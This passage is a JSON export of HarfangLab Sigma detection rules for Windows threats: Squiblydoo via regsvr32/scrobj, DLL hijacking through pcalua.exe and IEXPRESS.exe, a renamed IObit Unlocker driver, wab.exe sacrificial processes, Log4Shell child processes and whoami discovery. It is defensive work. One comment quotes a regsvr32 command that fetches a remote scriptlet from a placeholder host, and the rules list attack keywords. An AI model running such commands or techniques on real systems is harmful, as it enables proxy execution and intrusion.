"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615428Z",
"creation_date": "2026-03-23T11:45:34.615432Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615439Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://car.mitre.org/analytics/CAR-2019-04-003/",
"https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo",
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1218/010/",
"https://lolbas-project.github.io/lolbas/Libraries/Scrobj/",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
],
"name": "t1218_010_squiblydoo.yml",
"content": "title: Possible Squiblydoo Attack Detected\nid: 09718066-8257-4dd4-83e0-14787bbc9fd3\ndescription: |\n Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\n Attackers can use this technique to proxy execution of malicious code.\n This can be a sign of Covenant Regsvr32 launcher exploitation.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/010/\n - https://lolbas-project.github.io/lolbas/Libraries/Scrobj/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\ndate: 2021/02/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # regsvr32 /s /u /n /i:http://xxx.xxx.xxxx.xxx:9998/19jSi scrobj\n selection_1:\n - Image|endswith: '\\regsvr32.exe'\n - OriginalFileName: 'REGSVR32.EXE'\n selection_2:\n CommandLine|contains: 'scrobj'\n\n exclusion_scrobj:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe ?:\\windows\\system32\\scrobj.dll /s'\n - '?:\\WINDOWS\\SysWoW64\\regsvr32.exe ?:\\WINDOWS\\SysWoW64\\scrobj.dll /s'\n - 'regsvr32.exe /s ?:\\Windows??system32\\scrobj.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
"rule_name": "Possible Squiblydoo Attack Detected",
"rule_description": "Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\nAttackers can use this technique to proxy execution of malicious code.\nThis can be a sign of Covenant Regsvr32 launcher exploitation.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594813Z",
"creation_date": "2026-03-23T11:45:34.594816Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594824Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pcalua.yml",
"content": "title: DLL Hijacking via pcalua.exe\nid: 098502c3-27e1-4c6f-a53e-8fa8f3dd549f\ndescription: |\n Detects potential Windows DLL Hijacking via pcalua.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcalua.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\pcaui.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
"rule_name": "DLL Hijacking via pcalua.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pcalua.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627557Z",
"creation_date": "2026-03-23T11:45:34.627559Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627563Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_renamed_iobitunlocker_driver.yml",
"content": "title: Renamed IObit Unlocker Driver Loaded\nid: 09c303fe-d535-4d15-9f45-17f91b3e39fc\ndescription: |\n Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\n This driver has been abused by adversaries to disable security tools and evade detection.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Tool.IoBitUnlocker\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n OriginalFileName: 'IObitUnlocker.sys'\n\n # This is handled by the rule 79f2b027-0261-441e-a1d1-d569515a7c9b\n filter_image:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
"rule_name": "Renamed IObit Unlocker Driver Loaded",
"rule_description": "Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\nThis driver has been abused by adversaries to disable security tools and evade detection.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616726Z",
"creation_date": "2026-03-23T11:45:34.616729Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_wab.yml",
"content": "title: Wab.exe Sacrificial Process Spawned\nid: 09e88047-86aa-4e82-a0bb-4d8613732d6a\ndescription: |\n Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n It is recommended to investigate the parent process performing this action and the destination IP address of the wab.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/22\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Program Files\\Windows Mail\\wab.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
"rule_name": "Wab.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the wab.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-22",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073376Z",
"creation_date": "2026-03-23T11:45:34.073377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073382Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/",
"https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
"https://attack.mitre.org/versions/v10/techniques/T1190/"
],
"name": "t1190_log4j_vulnerability_exploitation.yml",
"content": "title: Suspicious Process Spawned by Java Application\nid: 09f74bd7-74d5-4ebb-bdda-430f8cf9a81f\ndescription: |\n Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\n This critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\n It is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\nreferences:\n - https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/\n - https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\n - https://attack.mitre.org/versions/v10/techniques/T1190/\ndate: 2021/12/20\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Java\n - classification.Windows.Exploit.Log4Shell\n - classification.Windows.Exploit.CVE-2021-44228\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n - ParentImage|endswith: '\\cmd.exe'\n GrandparentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n\n selection_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'iex'\n - 'invoke-expression'\n - 'Start-Process'\n - 'New-Object -ComObject'\n - '*^*^*^*'\n\n selection_msiexec:\n Image|endswith: '\\msiexec.exe'\n CommandLine|contains: 'http'\n\n selection_mshta:\n Image|endswith: '\\mshta.exe'\n CommandLine|contains: 'http'\n\n selection_regsvr32:\n 
Image|endswith: '\\regsvr32.exe'\n CommandLine|contains: 'http'\n\n selection_rundll32:\n Image|endswith: '\\rundll32.exe'\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n selection_hh:\n Image|endswith: '\\hh.exe'\n CommandLine|contains: 'http'\n\n selection_schtasks:\n Image|endswith: '\\schtasks.exe'\n CommandLine|contains: '/create'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'powershell.exe -Command & {Start-Process -FilePath `\"?:\\KineQuantum\\steamvrredist\\bin\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files (x86)\\'\n - '/tr ?:\\Apple\\Local\\Library\\WebObjects\\Applications\\'\n - '/tr ??:\\Program Files\\'\n - '/tr ??:\\Program Files (x86)\\'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some Java applications may spawn a legitimate process.\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
"rule_name": "Suspicious Process Spawned by Java Application",
"rule_description": "Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\nThis critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\nIt is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\n",
"rule_creation_date": "2021-12-20",
"rule_modified_date": "2025-05-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622840Z",
"creation_date": "2026-03-23T11:45:34.622842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622846Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_windows.yml",
"content": "title: Current Username Discovered via Whoami (Windows)\nid: 0a3934f6-2b4c-4fb0-81ea-2601e7665b3a\ndescription: |\n Detects the execution of whoami.exe.\n This command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_commandline:\n CommandLine:\n - 'whoami'\n - 'whoami ?all'\n - 'whoami ?priv'\n - 'whoami ?groups'\n - 'whoami.exe'\n - 'whoami.exe ?all'\n - 'whoami.exe ?priv'\n - 'whoami.exe ?groups'\n ParentImage|contains: '?'\n\n # This is handled by the rule 77575317-f87a-49a1-b295-f2a7a23f75d4\n filter_system:\n IntegrityLevel: 'System'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_grandparentimage:\n GrandparentImage|endswith:\n # IBM i Access Client Solutions\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - 
'\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_msys2:\n Image: '?:\\msys64\\usr\\bin\\whoami.exe'\n ParentImage:\n - '?:\\msys64\\usr\\bin\\bash.exe'\n - '?:\\msys64\\usr\\bin\\sh.exe'\n\n exclusion_ms_monitoring_agent:\n # grandparent: C:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs 0 {B87E55DB-EA55-993D-FA42-5A4B215D0593} {59E3FB68-8F43-D96C-1EF9-EE090EDDD8E6} false xxx_domain_name_xxx yyyyy 11001 21001\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs '\n CurrentDirectory|startswith: '?:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State'\n\n exclusion_palo_alto:\n # C:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & C:\\windows\\System32\\whoami.exe /groups\n # but for whatever reason, we don't have the grandparentinfo (PanGpHip.exe)\n CommandLine: '?:\\windows\\System32\\whoami.exe /groups' # 1 space before /groups\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & ?:\\windows\\System32\\whoami.exe /groups' # 2 spaces before /groups\n\n exclusion_podman:\n GrandparentImage|endswith: '\\Podman Desktop.exe'\n ParentCommandLine: 'powershell.exe $null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object {$_.SID -eq \"S-1-5-32-544\"})'\n\n exclusion_cygwin:\n Image|endswith: '\\cygwin64\\bin\\whoami.exe'\n ParentImage|endswith: '\\cygwin64\\bin\\bash.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\postgresql-*.*-*-windows-x64.exe|'\n - 
'|?:\\VTOM\\ABM\\BIN\\bdaemon.exe|'\n - '|?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe|'\n\n exclusion_schedule:\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
"rule_name": "Current Username Discovered via Whoami (Windows)",
"rule_description": "Detects the execution of whoami.exe.\nThis command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098031Z",
"creation_date": "2026-03-23T11:45:34.098033Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098037Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iexpress.yml",
"content": "title: DLL Hijacking via IEXPRESS.exe\nid: 0a4830e7-82c9-4ac1-b846-a68dc4caa7ab\ndescription: |\n Detects potential Windows DLL Hijacking via IEXPRESS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IEXPRESS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
"rule_name": "DLL Hijacking via IEXPRESS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IEXPRESS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
